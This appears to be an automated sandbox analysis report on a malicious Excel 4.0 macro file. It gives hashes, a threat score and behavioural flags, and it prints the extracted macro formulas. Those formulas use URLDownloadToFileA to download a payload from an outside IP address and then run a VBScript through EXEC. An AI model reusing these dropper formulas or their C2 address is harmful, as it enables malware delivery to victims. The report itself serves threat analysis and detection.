General

  • Target

    b6c2750efc97ccf9fa696558392252e7

  • Size

    6KB

  • Sample

    240306-hfcllaef43

  • MD5

    b6c2750efc97ccf9fa696558392252e7

  • SHA1

    9101fbe59891de67fec8f8e69ccea36b87d9b42e

  • SHA256

    4fd11319c0d7e3a0397a7f761d19964cb9bee3d23ab85c2302c302cceab63cce

  • SHA512

    e4f4c3f5599c7ed59ee437e092e674d8c48ace522eeb10aedd45bec4d56e056d50c1d81fdcd76b123e7dc1b551f36f3bca9336ac51a51b425e39c3c0de2c8033

  • SSDEEP

    192:NDSZauSepbrA2OmmfRzp8UhHFBFYuz3b98yy+vZS+gu:NMauhFM2wVd1FYC3b98yy+vZou

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes
  • formulas

    =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

xlm40.dropper

http://google.com/index.php

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://46.17.98.187/index.php

Targets

    • Target

      b6c2750efc97ccf9fa696558392252e7

    • Size

      6KB

    • MD5

      b6c2750efc97ccf9fa696558392252e7

    • SHA1

      9101fbe59891de67fec8f8e69ccea36b87d9b42e

    • SHA256

      4fd11319c0d7e3a0397a7f761d19964cb9bee3d23ab85c2302c302cceab63cce

    • SHA512

      e4f4c3f5599c7ed59ee437e092e674d8c48ace522eeb10aedd45bec4d56e056d50c1d81fdcd76b123e7dc1b551f36f3bca9336ac51a51b425e39c3c0de2c8033

    • SSDEEP

      192:NDSZauSepbrA2OmmfRzp8UhHFBFYuz3b98yy+vZS+gu:NMauhFM2wVd1FYC3b98yy+vZou

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Process spawned suspicious child process

      This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.

MITRE ATT&CK Enterprise v15

Tasks